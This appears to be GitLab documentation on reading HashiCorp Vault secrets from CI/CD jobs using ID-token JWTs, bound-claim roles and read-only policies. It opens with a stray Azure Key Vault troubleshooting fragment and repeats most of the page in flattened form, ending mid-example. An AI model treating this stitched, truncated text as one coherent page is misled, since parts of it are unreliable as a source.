The job can't be created because one or more of the required variables are not defined:

- `AZURE_KEY_VAULT_SERVER_URL`
- `AZURE_CLIENT_ID`
- `AZURE_TENANT_ID`
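To find out which of the required variables actually reach your pipeline, you can run a plain job that checks for them. This is a debugging sketch (the `check_azure_vault_config` job name is illustrative); it deliberately defines no `secrets`, so it can start even when the secrets configuration is broken:

```yaml
check_azure_vault_config:
  script:
    # Each check prints a message only when the variable is missing.
    - test -n "$AZURE_KEY_VAULT_SERVER_URL" || echo "AZURE_KEY_VAULT_SERVER_URL is not defined"
    - test -n "$AZURE_CLIENT_ID" || echo "AZURE_CLIENT_ID is not defined"
    - test -n "$AZURE_TENANT_ID" || echo "AZURE_TENANT_ID is not defined"
```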
---
stage: Software Supply Chain Security
group: Pipeline Security
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Use HashiCorp Vault secrets in GitLab CI/CD
breadcrumbs:
  - doc
  - ci
  - secrets
---
{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< alert type="warning" >}}

Authenticating with `CI_JOB_JWT` was [deprecated in GitLab 15.9 and removed in GitLab 17.0](../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated). Use [ID tokens to authenticate with HashiCorp Vault](hashicorp_vault.md#example) instead, as demonstrated on this page.

{{< /alert >}}

{{< alert type="note" >}}

Starting in Vault 1.17, [JWT auth login requires bound audiences on the role](https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.17.x#jwt-auth-login-requires-bound-audiences-on-the-role) when the JWT contains an `aud` claim. The `aud` claim can be a single string or a list of strings.

{{< /alert >}}

This tutorial demonstrates how to authenticate, configure, and read secrets with HashiCorp's Vault from GitLab CI/CD.

## Prerequisites

This tutorial assumes you are familiar with GitLab CI/CD and Vault.

To follow along, you must have:

- An account on GitLab.
- Access to a running Vault server (at least v1.2.0) to configure authentication and to create roles and policies. For HashiCorp Vault, this can be the Open Source or Enterprise version.

{{< alert type="note" >}}

You must replace the `vault.example.com` URL in the following example with the URL of your Vault server, and `gitlab.example.com` with the URL of your GitLab instance.

{{< /alert >}}

## HashiCorp Vault secrets integration

ID tokens are JSON Web Tokens (JWTs) used for OIDC authentication with third-party services. If a job has at least one ID token defined, the `secrets` keyword automatically uses that token to authenticate with Vault.
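For example, a job that authenticates to Vault with an ID token can be as small as the following sketch. The job name, audience, and secret path are illustrative placeholders; the full setup is described in the rest of this tutorial:

```yaml
read_secret:
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com
  secrets:
    DATABASE_PASSWORD:
      vault: myproject/staging/db/password@secret
  script:
    # use-password.sh is a hypothetical script; the secret is resolved
    # before the job's script runs.
    - use-password.sh "$DATABASE_PASSWORD"
```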
The following fields are included in the JWT:

| Field                   | When                                       | Description |
|-------------------------|--------------------------------------------|-------------|
| `jti`                   | Always                                     | Unique identifier for this token |
| `iss`                   | Always                                     | Issuer, the domain of your GitLab instance |
| `iat`                   | Always                                     | Issued at |
| `nbf`                   | Always                                     | Not valid before |
| `exp`                   | Always                                     | Expires at |
| `sub`                   | Always                                     | Subject (job ID) |
| `namespace_id`          | Always                                     | Use this to scope to group or user level namespace by ID |
| `namespace_path`        | Always                                     | Use this to scope to group or user level namespace by path |
| `project_id`            | Always                                     | Use this to scope to project by ID |
| `project_path`          | Always                                     | Use this to scope to project by path |
| `user_id`               | Always                                     | ID of the user executing the job |
| `user_login`            | Always                                     | Username of the user executing the job |
| `user_email`            | Always                                     | Email of the user executing the job |
| `pipeline_id`           | Always                                     | ID of this pipeline |
| `pipeline_source`       | Always                                     | [Pipeline source](../jobs/job_rules.md#common-if-clauses-with-predefined-variables) |
| `job_id`                | Always                                     | ID of this job |
| `ref`                   | Always                                     | Git ref for this job |
| `ref_type`              | Always                                     | Git ref type, either `branch` or `tag` |
| `ref_path`              | Always                                     | Fully qualified ref for the job. For example, `refs/heads/main`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/119075) in GitLab 16.0. |
| `ref_protected`         | Always                                     | `true` if this Git ref is protected, `false` otherwise |
| `environment`           | Job specifies an environment               | Environment this job specifies |
| `groups_direct`         | User is a direct member of 0 to 200 groups | The paths of the user's direct membership groups. Omitted if the user is a direct member of more than 200 groups. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/435848) in GitLab 16.11). |
| `environment_protected` | Job specifies an environment               | `true` if specified environment is protected, `false` otherwise |
| `deployment_tier`       | Job specifies an environment               | [Deployment tier](../environments/_index.md#deployment-tier-of-environments) of environment this job specifies ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/363590) in GitLab 15.2) |
| `environment_action`    | Job specifies an environment               | [Environment action (`environment:action`)](../environments/_index.md) specified in the job. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/) in GitLab 16.5) |

Example JWT payload:

```json
{
  "jti": "c82eeb0c-5c6f-4a33-abf5-4c474b92b558",
  "iss": "gitlab.example.com",
  "iat": 1585710286,
  "nbf": 1585798372,
  "exp": 1585713886,
  "sub": "job_1212",
  "namespace_id": "1",
  "namespace_path": "mygroup",
  "project_id": "22",
  "project_path": "mygroup/myproject",
  "user_id": "42",
  "user_login": "myuser",
  "user_email": "myuser@example.com",
  "pipeline_id": "1212",
  "pipeline_source": "web",
  "job_id": "1212",
  "ref": "auto-deploy-2020-04-01",
  "ref_type": "branch",
  "ref_path": "refs/heads/auto-deploy-2020-04-01",
  "ref_protected": "true",
  "groups_direct": ["mygroup/mysubgroup", "myothergroup/myothersubgroup"],
  "environment": "production",
  "environment_protected": "true",
  "environment_action": "start"
}
```

The JWT is encoded by using RS256 and signed with a dedicated private key. The expiry time for the token is set to the job's timeout, if specified, or to 5 minutes if it is not. The key used to sign this token may change without any notice. In that case, retrying the job generates a new JWT using the current signing key.

You can use this JWT for authentication with a Vault server that is configured to allow the JWT authentication method. Provide your GitLab instance's base URL (for example `https://gitlab.example.com`) to your Vault server as the `oidc_discovery_url`. The server can then retrieve the keys for validating the token from your instance.
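GitLab serves the OIDC discovery document at `/.well-known/openid-configuration`. Before wiring up authentication, you can check from a runner that the document is reachable (the Vault server needs the same reachability). A sketch, assuming `https://gitlab.example.com` is your instance URL:

```yaml
check_discovery:
  script:
    # Fails the job if the OIDC discovery document cannot be fetched.
    - curl --fail --silent "https://gitlab.example.com/.well-known/openid-configuration"
```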
When configuring roles in Vault, you can use [bound claims](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-claims) to match against the JWT claims and restrict which secrets each CI/CD job has access to.

To communicate with Vault, you can use either its CLI client or perform API requests (using `curl` or another client).

## Example

{{< alert type="warning" >}}

JWTs are credentials, which can grant access to resources. Be careful where you paste them!

{{< /alert >}}

Consider a scenario where you store passwords for your staging and production databases in a Vault server. This scenario assumes you use the [KV v2](https://developer.hashicorp.com/vault/docs/secrets/kv#kv-version-2) secret engine. If you are using [KV v1](https://developer.hashicorp.com/vault/docs/secrets/kv#version-comparison), remove `/data/` from the following policy paths, and see [how to configure your CI/CD jobs](convert-to-id-tokens.md#kv-secrets-engine-v1).

You can retrieve the passwords with the `vault kv get` command.

```shell
$ vault kv get -field=password secret/myproject/staging/db
pa$$w0rd

$ vault kv get -field=password secret/myproject/production/db
real-pa$$w0rd
```

Your staging password is `pa$$w0rd`, and your production password is `real-pa$$w0rd`.

To configure your Vault server, start by enabling the [JWT Auth](https://developer.hashicorp.com/vault/docs/auth/jwt) method:

```shell
$ vault auth enable jwt
Success! Enabled jwt auth method at: jwt/
```

Then create policies that allow you to read these secrets (one for each secret):

```shell
$ vault policy write myproject-staging - <<EOF
# Policy name: myproject-staging
#
# Read-only permission on 'secret/data/myproject/staging/*' path
path "secret/data/myproject/staging/*" {
  capabilities = [ "read" ]
}
EOF
Success! Uploaded policy: myproject-staging

$ vault policy write myproject-production - <<EOF
# Policy name: myproject-production
#
# Read-only permission on 'secret/data/myproject/production/*' path
path "secret/data/myproject/production/*" {
  capabilities = [ "read" ]
}
EOF
Success! Uploaded policy: myproject-production
```

You also need roles that link the JWT with these policies.

For example, one role for staging named `myproject-staging`. The [bound claims](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims) are configured to only allow the policy to be used for the `main` branch in the project with ID `22`:

```shell
$ vault write auth/jwt/role/myproject-staging - <<EOF
{
  "role_type": "jwt",
  "policies": ["myproject-staging"],
  "token_explicit_max_ttl": 60,
  "user_claim": "user_email",
  "bound_audiences": "https://vault.example.com",
  "bound_claims": {
    "project_id": "22",
    "ref": "main",
    "ref_type": "branch"
  }
}
EOF
```

And one role for production named `myproject-production`. The `bound_claims` section for this role only allows protected branches that match the `auto-deploy-*` pattern to access the secrets:

```shell
$ vault write auth/jwt/role/myproject-production - <<EOF
{
  "role_type": "jwt",
  "policies": ["myproject-production"],
  "token_explicit_max_ttl": 60,
  "user_claim": "user_email",
  "bound_audiences": "https://vault.example.com",
  "bound_claims_type": "glob",
  "bound_claims": {
    "project_id": "22",
    "ref_protected": "true",
    "ref_type": "branch",
    "ref": "auto-deploy-*"
  }
}
EOF
```

Combined with [protected branches](../../user/project/repository/branches/protected.md), you can restrict who is able to authenticate and read the secrets.

Any of the claims [included in the JWT](#hashicorp-vault-secrets-integration) can be matched against a list of values in the bound claims.
For example:

```json
"bound_claims": {
  "user_login": ["alice", "bob", "mallory"]
}

"bound_claims": {
  "ref": ["main", "develop", "test"]
}

"bound_claims": {
  "namespace_id": ["10", "20", "30"]
}

"bound_claims": {
  "project_id": ["12", "22", "37"]
}
```

- If only `namespace_id` is used, all projects in the namespace are allowed. Nested projects are not included, so their namespace IDs must also be added to the list if needed.
- If both `namespace_id` and `project_id` are used, Vault first checks if the project's namespace is in `namespace_id`, then checks if the project is in `project_id`.

[`token_explicit_max_ttl`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#token_explicit_max_ttl) specifies that the token issued by Vault, upon successful authentication, has a hard lifetime limit of 60 seconds.

[`user_claim`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#user_claim) specifies the name for the Identity alias created by Vault upon a successful login.

[`bound_claims_type`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims_type) configures the interpretation of the `bound_claims` values. If set to `glob`, the values are interpreted as globs, with `*` matching any number of characters.

The claim fields listed in [the previous table](#hashicorp-vault-secrets-integration) can also be accessed for [Vault's policy path templating](https://developer.hashicorp.com/vault/tutorials/policies/policy-templating?in=vault%2Fpolicies) purposes by using the accessor name of the JWT auth in Vault. The [mount accessor name](https://developer.hashicorp.com/vault/tutorials/auth-methods/identity#step-1-create-an-entity-with-alias) (`ACCESSOR_NAME` in the following example) can be retrieved by running `vault auth list`.
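For instance, the accessor name can be read from the `Accessor` column of `vault auth list` output, or extracted directly. This is a sketch that assumes the auth method is mounted at the default `jwt/` path and that `jq` is available:

```shell
vault auth list -format=json | jq -r '.["jwt/"].accessor'
```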
Policy template example making use of a named metadata field named `project_path`:

```plaintext
path "secret/data/{{identity.entity.aliases.ACCESSOR_NAME.metadata.project_path}}/staging/*" {
  capabilities = [ "read" ]
}
```

Role example to support the previous templated policy mapping the claim field `project_path` as a metadata field through use of the [`claim_mappings`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#claim_mappings) configuration:

```plaintext
{
  "role_type": "jwt",
  ...
  "claim_mappings": {
    "project_path": "project_path"
  }
}
```

For the full list of options, see Vault's [Create Role documentation](https://developer.hashicorp.com/vault/api-docs/auth/jwt#create-role).

{{< alert type="warning" >}}

Always restrict your roles to project or namespace by using one of the provided claims (for example, `project_id` or `namespace_id`). Otherwise any JWT generated by this instance may be allowed to authenticate using this role.

{{< /alert >}}

Now, configure the JWT Authentication method:

```shell
$ vault write auth/jwt/config \
    oidc_discovery_url="https://gitlab.example.com" \
    bound_issuer="https://gitlab.example.com"
```

[`bound_issuer`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_issuer) specifies that only a JWT with the issuer (that is, the `iss` claim) set to `gitlab.example.com` can use this method to authenticate, and that the `oidc_discovery_url` (`https://gitlab.example.com`) should be used to validate the token.

For the full list of available configuration options, see Vault's [API documentation](https://developer.hashicorp.com/vault/api-docs/auth/jwt#configure).

In GitLab, create the following [CI/CD variables](../variables/_index.md#for-a-project) to provide details about your Vault server:

- `VAULT_SERVER_URL` - The URL of your Vault server, for example `https://vault.example.com:8200`.
- `VAULT_AUTH_ROLE` - Optional. Name of the Vault JWT Auth role to use when attempting to authenticate.
  In this tutorial, we already created two roles with the names `myproject-staging` and `myproject-production`. If no role is specified, Vault uses the [default role](https://developer.hashicorp.com/vault/api-docs/auth/jwt#default_role) specified when the authentication method was configured.
- `VAULT_AUTH_PATH` - Optional. The path where the authentication method is mounted. Default is `jwt`.
- `VAULT_NAMESPACE` - Optional. The [Vault Enterprise namespace](https://developer.hashicorp.com/vault/docs/enterprise/namespaces) to use for reading secrets and authentication. If no namespace is specified, Vault uses the root (`/`) namespace. The setting is ignored by Vault Open Source.

### Automatic ID token authentication with Hashicorp Vault

The following job, when run for the default branch, can read secrets under `secret/myproject/staging/`, but not the secrets under `secret/myproject/production/`:

```yaml
job_with_secrets:
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com
  secrets:
    STAGING_DB_PASSWORD:
      # Translates to a path of 'secret/myproject/staging/db' and field 'password'.
      # Authenticates using $VAULT_ID_TOKEN.
      vault: myproject/staging/db/password@secret
  script:
    - access-staging-db.sh --token $STAGING_DB_PASSWORD
```

In this example:

- `id_tokens` - The JSON Web Token (JWT) used for OIDC authentication. The `aud` claim is set to match the `bound_audiences` parameter of the `role` used for the Vault JWT authentication method.
- `@secret` - The vault name, where your Secrets Engines are enabled.
- `myproject/staging/db` - The path location of the secret in Vault.
- `password` - The field to be fetched in the referenced secret.

If more than one ID token is defined, use the `token` keyword to specify which token should be used.
For example:

```yaml
job_with_secrets:
  id_tokens:
    FIRST_ID_TOKEN:
      aud: https://first.service.com
    SECOND_ID_TOKEN:
      aud: https://second.service.com
  secrets:
    FIRST_DB_PASSWORD:
      vault: first/db/password
      token: $FIRST_ID_TOKEN
    SECOND_DB_PASSWORD:
      vault: second/db/password
      token: $SECOND_ID_TOKEN
  script:
    - access-first-db.sh --token $FIRST_DB_PASSWORD
    - access-second-db.sh --token $SECOND_DB_PASSWORD
```

### Manual ID Token authentication

You can use ID tokens to authenticate with HashiCorp Vault manually. For example:

```yaml
manual_authentication:
  variables:
    VAULT_ADDR: http://vault.example.com:8200
  image: vault:latest
  id_tokens:
    VAULT_ID_TOKEN:
      aud: http://vault.example.com
  script:
    - export VAULT_TOKEN="$(vault write -field=token auth/jwt/login role=myproject-example jwt=$VAULT_ID_TOKEN)"
    - export PASSWORD="$(vault kv get -field=password secret/myproject/example/db)"
    - my-authentication-script.sh $VAULT_TOKEN $PASSWORD
```

### Limit token access to Vault secrets

You can control ID token access to Vault secrets by using Vault protections and GitLab features. For example, restrict the token by:

- Using Vault [bound audiences](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-audiences) for specific ID token `aud` claims.
- Using Vault [bound claims](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-claims) for specific groups using `group_claim`.
- Hard coding values for Vault bound claims based on the `user_login` and `user_email` of specific users.
- Setting Vault time limits for TTL of the token as specified in [`token_explicit_max_ttl`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#token_explicit_max_ttl), where the token expires after authentication.
- Scoping the JWT to [GitLab protected branches](../../user/project/repository/branches/protected.md) that are restricted to a subset of project users.
- Scoping the JWT to [GitLab protected tags](../../user/project/protected_tags.md) that are restricted to a subset of project users.
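For example, a role that combines several of these restrictions (a short TTL, specific users, and protected refs only) might look like the following sketch. The role name, project ID, and user names are illustrative:

```shell
vault write auth/jwt/role/myproject-restricted - <<EOF
{
  "role_type": "jwt",
  "policies": ["myproject-staging"],
  "token_explicit_max_ttl": 60,
  "user_claim": "user_email",
  "bound_audiences": "https://vault.example.com",
  "bound_claims": {
    "project_id": "22",
    "user_login": ["alice", "bob"],
    "ref_protected": "true"
  }
}
EOF
```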
## Troubleshooting

### `The secrets provider can not be found. Check your CI/CD variables and try again.` message

You might receive this error when attempting to start a job configured to access HashiCorp Vault:

```plaintext
The secrets provider can not be found. Check your CI/CD variables and try again.
```

The job can't be created because the required variable is not defined:

- `VAULT_SERVER_URL`

### `api error: status code 400: missing role` error

You might receive a `missing role` error when attempting to start a job configured to access HashiCorp Vault. The error could be because the `VAULT_AUTH_ROLE` variable is not defined, so the job cannot authenticate with the Vault server.

### `audience claim does not match any expected audience` error

If there is a mismatch between the values of the `aud:` claim of the ID token specified in the YAML file and the `bound_audiences` parameter of the role used for JWT authentication, you can get this error:

```plaintext
invalid audience (aud) claim: audience claim does not match any expected audience
```

Make sure these values are the same.
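For example, with the roles created earlier in this tutorial, the `aud` value in the job must be `https://vault.example.com`, because that is what `bound_audiences` is set to in those roles:

```yaml
job_with_secrets:
  id_tokens:
    VAULT_ID_TOKEN:
      # Must match the `bound_audiences` value in the Vault role.
      aud: https://vault.example.com
```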
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Use HashiCorp Vault secrets in GitLab CI/CD breadcrumbs: - doc - ci - secrets --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} Authenticating with `CI_JOB_JWT` was [deprecated in GitLab 15.9 and removed in GitLab 17.0](../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated). Use [ID tokens to authenticate with HashiCorp Vault](hashicorp_vault.md#example) instead, as demonstrated on this page. {{< /alert >}} {{< alert type="note" >}} Starting in Vault 1.17, [JWT auth login requires bound audiences on the role](https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.17.x#jwt-auth-login-requires-bound-audiences-on-the-role) when the JWT contains an `aud` claim. The `aud` claim can be a single string or a list of strings. {{< /alert >}} This tutorial demonstrates how to authenticate, configure, and read secrets with HashiCorp's Vault from GitLab CI/CD. ## Prerequisites This tutorial assumes you are familiar with GitLab CI/CD and Vault. To follow along, you must have: - An account on GitLab. - Access to a running Vault server (at least v1.2.0) to configure authentication and to create roles and policies. For HashiCorp Vaults, this can be the Open Source or Enterprise version. {{< alert type="note" >}} You must replace the `vault.example.com` URL in the following example with the URL of your Vault server, and `gitlab.example.com` with the URL of your GitLab instance. {{< /alert >}} ## HashiCorp Vault secrets integration ID tokens are JSON Web Tokens (JWTs) used for OIDC authentication with third-party services. 
If a job has at least one ID token defined, the `secrets` keyword automatically uses that token to authenticate with Vault. The following fields are included in the JWT: | Field | When | Description | |-------------------------|--------------------------------------------|-------------| | `jti` | Always | Unique identifier for this token | | `iss` | Always | Issuer, the domain of your GitLab instance | | `iat` | Always | Issued at | | `nbf` | Always | Not valid before | | `exp` | Always | Expires at | | `sub` | Always | Subject (job ID) | | `namespace_id` | Always | Use this to scope to group or user level namespace by ID | | `namespace_path` | Always | Use this to scope to group or user level namespace by path | | `project_id` | Always | Use this to scope to project by ID | | `project_path` | Always | Use this to scope to project by path | | `user_id` | Always | ID of the user executing the job | | `user_login` | Always | Username of the user executing the job | | `user_email` | Always | Email of the user executing the job | | `pipeline_id` | Always | ID of this pipeline | | `pipeline_source` | Always | [Pipeline source](../jobs/job_rules.md#common-if-clauses-with-predefined-variables) | | `job_id` | Always | ID of this job | | `ref` | Always | Git ref for this job | | `ref_type` | Always | Git ref type, either `branch` or `tag` | | `ref_path` | Always | Fully qualified ref for the job. For example, `refs/heads/main`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/119075) in GitLab 16.0. | | `ref_protected` | Always | `true` if this Git ref is protected, `false` otherwise | | `environment` | Job specifies an environment | Environment this job specifies | | `groups_direct` | User is a direct member of 0 to 200 groups | The paths of the user's direct membership groups. Omitted if the user is a direct member of more than 200 groups. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/435848) in GitLab 16.11). 
| | `environment_protected` | Job specifies an environment | `true` if specified environment is protected, `false` otherwise | | `deployment_tier` | Job specifies an environment | [Deployment tier](../environments/_index.md#deployment-tier-of-environments) of environment this job specifies ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/363590) in GitLab 15.2) | | `environment_action` | Job specifies an environment | [Environment action (`environment:action`)](../environments/_index.md) specified in the job. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/) in GitLab 16.5) | Example JWT payload: ```json { "jti": "c82eeb0c-5c6f-4a33-abf5-4c474b92b558", "iss": "gitlab.example.com", "iat": 1585710286, "nbf": 1585798372, "exp": 1585713886, "sub": "job_1212", "namespace_id": "1", "namespace_path": "mygroup", "project_id": "22", "project_path": "mygroup/myproject", "user_id": "42", "user_login": "myuser", "user_email": "myuser@example.com", "pipeline_id": "1212", "pipeline_source": "web", "job_id": "1212", "ref": "auto-deploy-2020-04-01", "ref_type": "branch", "ref_path": "refs/heads/auto-deploy-2020-04-01", "ref_protected": "true", "groups_direct": ["mygroup/mysubgroup", "myothergroup/myothersubgroup"], "environment": "production", "environment_protected": "true", "environment_action": "start" } ``` The JWT is encoded by using RS256 and signed with a dedicated private key. The expire time for the token is set to job's timeout, if specified, or 5 minutes if it is not. The key used to sign this token may change without any notice. In such case retrying the job generates new JWT using the current signing key. You can use this JWT for authentication with a Vault server that is configured to allow the JWT authentication method. Provide your GitLab instance's base URL (for example `https://gitlab.example.com`) to your Vault server as the `oidc_discovery_url`. The server can then retrieve the keys for validating the token from your instance. 
When configuring roles in Vault, you can use [bound claims](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-claims) to match against the JWT claims and restrict which secrets each CI/CD job has access to. To communicate with Vault, you can use either its CLI client or perform API requests (using `curl` or another client). ## Example {{< alert type="warning" >}} JWTs are credentials, which can grant access to resources. Be careful where you paste them! {{< /alert >}} Consider a scenario where you store passwords for your staging and production databases in a Vault server. This scenario assumes you use the [KV v2](https://developer.hashicorp.com/vault/docs/secrets/kv#kv-version-2) secret engine. If you are using [KV v1](https://developer.hashicorp.com/vault/docs/secrets/kv#version-comparison), remove `/data/` from the following policy paths, and see [how to configure your CI/CD jobs](convert-to-id-tokens.md#kv-secrets-engine-v1). You can retrieve the passwords with the `vault kv get` command. ```shell $ vault kv get -field=password secret/myproject/staging/db pa$$w0rd $ vault kv get -field=password secret/myproject/production/db real-pa$$w0rd ``` Your staging password is `pa$$w0rd`, and your production password is `real-pa$$w0rd`. To configure your Vault server, start by enabling the [JWT Auth](https://developer.hashicorp.com/vault/docs/auth/jwt) method: ```shell $ vault auth enable jwt Success! Enabled jwt auth method at: jwt/ ``` Then create policies that allow you to read these secrets (one for each secret): ```shell $ vault policy write myproject-staging - <<EOF # Policy name: myproject-staging # # Read-only permission on 'secret/data/myproject/staging/*' path path "secret/data/myproject/staging/*" { capabilities = [ "read" ] } EOF Success! 
Uploaded policy: myproject-staging $ vault policy write myproject-production - <<EOF # Policy name: myproject-production # # Read-only permission on 'secret/data/myproject/production/*' path path "secret/data/myproject/production/*" { capabilities = [ "read" ] } EOF Success! Uploaded policy: myproject-production ``` You also need roles that link the JWT with these policies. For example, one role for staging named `myproject-staging`. The [bound claims](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims) is configured to only allow the policy to be used for the `main` branch in the project with ID `22`: ```shell $ vault write auth/jwt/role/myproject-staging - <<EOF { "role_type": "jwt", "policies": ["myproject-staging"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": "https://vault.example.com", "bound_claims": { "project_id": "22", "ref": "main", "ref_type": "branch" } } EOF ``` And one role for production named `myproject-production`. The `bound_claims` section for this role only allows protected branches that match the `auto-deploy-*` pattern to access the secrets. ```shell $ vault write auth/jwt/role/myproject-production - <<EOF { "role_type": "jwt", "policies": ["myproject-production"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": "https://vault.example.com", "bound_claims_type": "glob", "bound_claims": { "project_id": "22", "ref_protected": "true", "ref_type": "branch", "ref": "auto-deploy-*" } } EOF ``` Combined with [protected branches](../../user/project/repository/branches/protected.md), you can restrict who is able to authenticate and read the secrets. Any of the claims [included in the JWT](#hashicorp-vault-secrets-integration) can be matched against a list of values in the bound claims. 
For example:

```json
"bound_claims": {
  "user_login": ["alice", "bob", "mallory"]
}

"bound_claims": {
  "ref": ["main", "develop", "test"]
}

"bound_claims": {
  "namespace_id": ["10", "20", "30"]
}

"bound_claims": {
  "project_id": ["12", "22", "37"]
}
```

- If only `namespace_id` is used, all projects in the namespace are allowed. Nested projects are not included, so their namespace IDs must also be added to the list if needed.
- If both `namespace_id` and `project_id` are used, Vault first checks if the project's namespace is in `namespace_id`, then checks if the project is in `project_id`.

[`token_explicit_max_ttl`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#token_explicit_max_ttl) specifies that the token issued by Vault, upon successful authentication, has a hard lifetime limit of 60 seconds.

[`user_claim`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#user_claim) specifies the name for the Identity alias created by Vault upon a successful login.

[`bound_claims_type`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims_type) configures the interpretation of the `bound_claims` values. If set to `glob`, the values are interpreted as globs, with `*` matching any number of characters.

The claim fields listed in [the previous table](#hashicorp-vault-secrets-integration) can also be accessed for [Vault's policy path templating](https://developer.hashicorp.com/vault/tutorials/policies/policy-templating?in=vault%2Fpolicies) purposes by using the accessor name of the JWT auth in Vault. The [mount accessor name](https://developer.hashicorp.com/vault/tutorials/auth-methods/identity#step-1-create-an-entity-with-alias) (`ACCESSOR_NAME` in the following example) can be retrieved by running `vault auth list`.
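To see how a glob-style bound claim such as `ref: auto-deploy-*` behaves, the matching can be sketched with shell-style globbing. This is only an illustration of the idea, not Vault's actual implementation: Vault's glob support is limited to `*`, while Python's `fnmatch` also honors `?` and character classes.

```python
from fnmatch import fnmatchcase

# Simplified illustration of glob-style bound-claim matching:
# the JWT claim value must match the configured glob pattern
# for authentication to succeed.
def claim_matches(claim_value: str, bound_pattern: str) -> bool:
    return fnmatchcase(claim_value, bound_pattern)

print(claim_matches("auto-deploy-2024-01", "auto-deploy-*"))  # True
print(claim_matches("main", "auto-deploy-*"))                 # False
```

With `bound_claims_type` left at its default (`string`), no glob interpretation happens and the claim must match a listed value exactly.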
Policy template example making use of a named metadata field named `project_path`:

```plaintext
path "secret/data/{{identity.entity.aliases.ACCESSOR_NAME.metadata.project_path}}/staging/*" {
  capabilities = [ "read" ]
}
```

Role example to support the previous templated policy mapping the claim field, `project_path`, as a metadata field through use of [`claim_mappings`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#claim_mappings) configuration:

```plaintext
{
  "role_type": "jwt",
  ...
  "claim_mappings": {
    "project_path": "project_path"
  }
}
```

For the full list of options, see Vault's [Create Role documentation](https://developer.hashicorp.com/vault/api-docs/auth/jwt#create-role).

{{< alert type="warning" >}}

Always restrict your roles to project or namespace by using one of the provided claims (for example, `project_id` or `namespace_id`). Otherwise any JWT generated by this instance may be allowed to authenticate using this role.

{{< /alert >}}

Now, configure the JWT Authentication method:

```shell
$ vault write auth/jwt/config \
    oidc_discovery_url="https://gitlab.example.com" \
    bound_issuer="https://gitlab.example.com"
```

[`bound_issuer`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_issuer) specifies that only a JWT with the issuer (that is, the `iss` claim) set to `gitlab.example.com` can use this method to authenticate, and that the `oidc_discovery_url` (`https://gitlab.example.com`) should be used to validate the token.

For the full list of available configuration options, see Vault's [API documentation](https://developer.hashicorp.com/vault/api-docs/auth/jwt#configure).

In GitLab, create the following [CI/CD variables](../variables/_index.md#for-a-project) to provide details about your Vault server:

- `VAULT_SERVER_URL` - The URL of your Vault server, for example `https://vault.example.com:8200`.
- `VAULT_AUTH_ROLE` - Optional. Name of the Vault JWT Auth role to use when attempting to authenticate. In this tutorial, we already created two roles with the names `myproject-staging` and `myproject-production`. If no role is specified, Vault uses the [default role](https://developer.hashicorp.com/vault/api-docs/auth/jwt#default_role) specified when the authentication method was configured.
- `VAULT_AUTH_PATH` - Optional. The path where the authentication method is mounted. Default is `jwt`.
- `VAULT_NAMESPACE` - Optional. The [Vault Enterprise namespace](https://developer.hashicorp.com/vault/docs/enterprise/namespaces) to use for reading secrets and authentication. If no namespace is specified, Vault uses the root (`/`) namespace. The setting is ignored by Vault Open Source.

### Automatic ID token authentication with Hashicorp Vault

The following job, when run for the default branch, can read secrets under `secret/myproject/staging/`, but not the secrets under `secret/myproject/production/`:

```yaml
job_with_secrets:
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com
  secrets:
    STAGING_DB_PASSWORD:
      vault: myproject/staging/db/password@secret  # translates to a path of 'secret/myproject/staging/db' and field 'password'. Authenticates using $VAULT_ID_TOKEN.
  script:
    - access-staging-db.sh --token $STAGING_DB_PASSWORD
```

In this example:

- `id_tokens` - The JSON Web Token (JWT) used for OIDC authentication. The `aud` claim is set to match the `bound_audiences` parameter of the `role` used for the Vault JWT authentication method.
- `@secret` - The vault name, where your Secrets Engines are enabled.
- `myproject/staging/db` - The path location of the secret in Vault.
- `password` - The field to be fetched in the referenced secret.

If more than one ID token is defined, use the `token` keyword to specify which token should be used.
For example:

```yaml
job_with_secrets:
  id_tokens:
    FIRST_ID_TOKEN:
      aud: https://first.service.com
    SECOND_ID_TOKEN:
      aud: https://second.service.com
  secrets:
    FIRST_DB_PASSWORD:
      vault: first/db/password
      token: $FIRST_ID_TOKEN
    SECOND_DB_PASSWORD:
      vault: second/db/password
      token: $SECOND_ID_TOKEN
  script:
